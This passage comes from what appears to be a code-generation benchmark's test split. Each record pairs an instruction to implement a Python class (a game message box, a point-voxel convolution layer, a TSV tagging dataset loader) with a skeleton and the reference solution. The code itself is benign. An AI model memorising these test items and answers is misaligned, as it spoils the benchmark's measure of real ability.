super().update(control_name)\n<|end_body_1|>\n", "class_docstring": "Displays message and requires answer or confirmation.", "class_name": "MessageBox", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000158", "length_bytes": 16213, "license_type": "permissive", "methods": [{"docstring": "Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.", "name": "__init__", "signature": "def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None)"}, {"docstring": "Controls: - , : OK - : Cancel", "name": "update", "signature": "def update(self, control_name)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002730", "prompt": "Implement the Python class `MessageBox` described below.\n\nClass description:\nDisplays message and requires answer or confirmation.\n\nMethod signatures and docstrings:\n- def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None): Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\n- def update(self, control_name): Controls: - , : OK - : Cancel", "prompted_full_text": "Implement the Python class `MessageBox` described below.\n\nClass description:\nDisplays message and requires answer or confirmation.\n\nMethod signatures and docstrings:\n- def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None): Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\n- def update(self, control_name): Controls: - , : OK - : Cancel\n\n<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n<|end_body_1|>\n", "revision_id": "584de7ad3e0817e28ee8e14e0298a06cae8e672e", "skeleton": "<|skeleton|>\nclass MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n <|body_0|>\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MessageBox:\n \"\"\"Displays message and requires answer or confirmation.\"\"\"\n\n def __init__(self, text, font, panel_widget, engine, text_shift=None, on_ok=None, on_cancel=None):\n \"\"\"Creates message box with given text and font (required). Panel widget will be draw under the text and will be aligned to the center of the screen. Text will start from the topleft corner of the panel plus optional text_shift. Optional on_ok and on_cancel events can be passed. Both should be callable with no arguments. They will be called upon corresponding user reaction.\"\"\"\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n\n def update(self, control_name):\n \"\"\"Controls: - , : OK - : Cancel\"\"\"\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return super().update(control_name)\n", "source": "the_stack_v2_python_sparse", "source_path": "nanomyth/view/sdl/context.py", "source_repo": "clckwrkbdgr/nanomyth", "split": "test", "star_events_count": 0} {"blob_id": "d9e557ec3e189281715e55d81fa18c5f3dcfe623", "bodies": ["super().__init__()\nself.in_channels = in_channels\nself.out_channels = out_channels\nself.kernel_size = kernel_size\nself.resolution = resolution\nself.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\nvoxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\nif with_se:\n voxel_layers.append(SE3d(out_channels))\nself.voxel_layers = nn.Sequential(*voxel_layers)\nself.point_features = SharedMLP(in_channels, out_channels)", "features, coords = inputs\nvoxel_features, voxel_coords = self.voxelization(features, coords)\nvoxel_features = self.voxel_layers(voxel_features)\nvoxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\nfused_features = voxel_features + self.point_features(features)\nreturn (fused_features, coords)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "class_docstring": "Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.", "class_name": "PVConv", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000159", "length_bytes": 22879, "license_type": "permissive", "methods": [{"docstring": "Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.", "name": "__init__", "signature": "def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06)"}, {"docstring": "Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.", "name": "forward", "signature": "def forward(self, inputs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006981", "prompt": "Implement the Python class `PVConv` described below.\n\nClass description:\nPoint Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06): Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\n- def forward(self, inputs): Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.", "prompted_full_text": "Implement the Python class `PVConv` described below.\n\nClass description:\nPoint Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06): Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\n- def forward(self, inputs): Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\n\n<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n<|end_body_0|>\n\n<|body_start_1|>\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n<|end_body_1|>\n", "revision_id": "51482281dc180786e7563c73c12ac5df89289748", "skeleton": "<|skeleton|>\nclass PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PVConv:\n \"\"\"Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features.\"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-06):\n \"\"\"Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization.\"\"\"\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.resolution = resolution\n self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps)\n voxel_layers = [nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=0.0001), nn.LeakyReLU(0.1, True)]\n if with_se:\n voxel_layers.append(SE3d(out_channels))\n self.voxel_layers = nn.Sequential(*voxel_layers)\n self.point_features = SharedMLP(in_channels, out_channels)\n\n def forward(self, inputs):\n \"\"\"Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features.\"\"\"\n features, coords = inputs\n voxel_features, voxel_coords = self.voxelization(features, coords)\n voxel_features = self.voxel_layers(voxel_features)\n voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training)\n fused_features = voxel_features + self.point_features(features)\n return (fused_features, coords)\n", "source": "the_stack_v2_python_sparse", "source_path": "ml3d/torch/models/pvcnn.py", "source_repo": "CosmosHua/Open3D-ML", "split": "test", "star_events_count": 0} {"blob_id": "c2e41376db9878a7231a2d01be4ef762e84374fc", "bodies": ["self.char_level = char_level\nself.hard_constraint = hard_constraint\nself.sent_delimiter = sent_delimiter\nself.max_seq_len = max_seq_len\nsuper().__init__(data, transform, cache, generate_idx)", "filepath = get_resource(filepath)\nfor words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}"], "bodies_text": "<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TSVTaggingDataset", "detected_licenses": ["Apache-2.0", "CC-BY-NC-SA-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000160", "length_bytes": 3588, "license_type": "permissive", "methods": [{"docstring": "Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for", "name": "__init__", "signature": "def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None"}, {"docstring": "Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O", "name": "load_file", "signature": "def load_file(self, filepath)"}], "n_methods": 2, "prompt": "Implement the Python class `TSVTaggingDataset` described below.\n\nClass description:\nImplement the TSVTaggingDataset class.\n\nMethod signatures and docstrings:\n- def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None: Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\n- def load_file(self, filepath): Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O", "prompted_full_text": "Implement the Python class `TSVTaggingDataset` described below.\n\nClass description:\nImplement the TSVTaggingDataset class.\n\nMethod signatures and docstrings:\n- def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None: Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\n- def load_file(self, filepath): Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\n\n<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n<|end_body_0|>\n\n<|body_start_1|>\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n<|end_body_1|>\n", "revision_id": "be2f04905a12990a527417bd47b79b851874a201", "skeleton": "<|skeleton|>\nclass TSVTaggingDataset:\n\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n <|body_0|>\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TSVTaggingDataset:\n def __init__(self, data: Union[str, List], transform: Union[Callable, List]=None, cache=None, generate_idx=None, max_seq_len=None, sent_delimiter=None, char_level=False, hard_constraint=False, **kwargs) -> None:\n \"\"\"Args: data: The local or remote path to a dataset, or a list of samples where each sample is a dict. transform: Predefined transform(s). cache: ``True`` to enable caching, so that transforms won't be called twice. generate_idx: Create a :const:`~hanlp_common.constants.IDX` field for each sample to store its order in dataset. Useful for prediction when samples are re-ordered by a sampler. max_seq_len: Sentences longer than ``max_seq_len`` will be split into shorter ones if possible. sent_delimiter: Delimiter between sentences, like period or comma, which indicates a long sentence can be split here. char_level: Whether the sequence length is measured at char level, which is never the case for\"\"\"\n self.char_level = char_level\n self.hard_constraint = hard_constraint\n self.sent_delimiter = sent_delimiter\n self.max_seq_len = max_seq_len\n super().__init__(data, transform, cache, generate_idx)\n\n def load_file(self, filepath):\n \"\"\"Load a ``.tsv`` file. A ``.tsv`` file for tagging is defined as a tab separated text file, where non-empty lines have two columns for token and tag respectively, empty lines mark the end of sentences. Args: filepath: Path to a ``.tsv`` tagging file. .. highlight:: bash .. code-block:: bash $ head eng.train.tsv -DOCSTART- O EU S-ORG rejects O German S-MISC call O to O boycott O British S-MISC lamb O\"\"\"\n filepath = get_resource(filepath)\n for words, tags in generate_words_tags_from_tsv(filepath, lower=False):\n if self.max_seq_len:\n start = 0\n for short_sents in split_long_sentence_into(words, self.max_seq_len, self.sent_delimiter, char_level=self.char_level, hard_constraint=self.hard_constraint):\n end = start + len(short_sents)\n yield {'token': short_sents, 'tag': tags[start:end]}\n start = end\n else:\n yield {'token': words, 'tag': tags}\n", "source": "the_stack_v2_python_sparse", "source_path": "hanlp/datasets/ner/loaders/tsv.py", "source_repo": "hankcs/HanLP", "split": "test", "star_events_count": 32454} {"blob_id": "67aa310d438af4c15b0fff235b6f3d109c2c00b3", "bodies": ["self.P = 1000\nself.sizes = np.array([0, 2, 3, 5, 8, 10, 12])\nself.calibration = BSS_Calibration()\nself.experiment = self.process_experiment()\nfoil_experiment = Au_Foil_Data()\nfoil_data = Au_Foil_Theoretical(foil_experiment)\nself.nebp_fudge_factor = foil_data.nebp_fudge_factor\nself.calc_responses()\nreturn", "lld = 400\ncounts = np.zeros(len(self.sizes))\n\ndef model(x, 